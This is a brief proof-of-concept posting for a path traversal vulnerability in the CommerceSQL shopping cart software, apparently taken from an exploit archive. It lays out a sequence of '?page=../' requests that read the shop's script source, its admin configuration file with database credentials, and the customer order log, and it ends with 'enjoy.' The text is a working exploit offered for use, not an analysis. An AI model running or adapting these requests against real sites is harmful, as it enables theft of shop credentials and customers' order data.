CommerceSQL Proof of concept.

Regarding:

http://packetstormsecurity.nl/0311-e...ommerceSQL.txt

Vulnerable:
* All CommerceSQL Shopping Cart Versions

http://[site address and path to index.cgi]

?page=../index.cgi

example:
http://www.site.com.com/cgi-bin/comm...e=../index.cgi

this is the file where you will find the paths to the shop admin files:

"./admin/configuration.pl", "./admin/admin_conf.pl",
"./admin/html_lib.pl");

next:

?page=../admin/manager.cgi

example:

http://www.site.com.com/cgi-bin/comm...in/manager.cgi

this where you'll find the path to the order.log and some other stuff

next:

?page=../admin/admin_conf.pl

example:

http://www.site.com.com/cgi-bin/comm.../admin_conf.pl

this is the admin configuration file and this is where you'll find the
database file name, username and password to access it

next:

?page=../admin/files/order.log

example:

http://www.site.com/cgi-bin/commerce...iles/order.log

enjoy.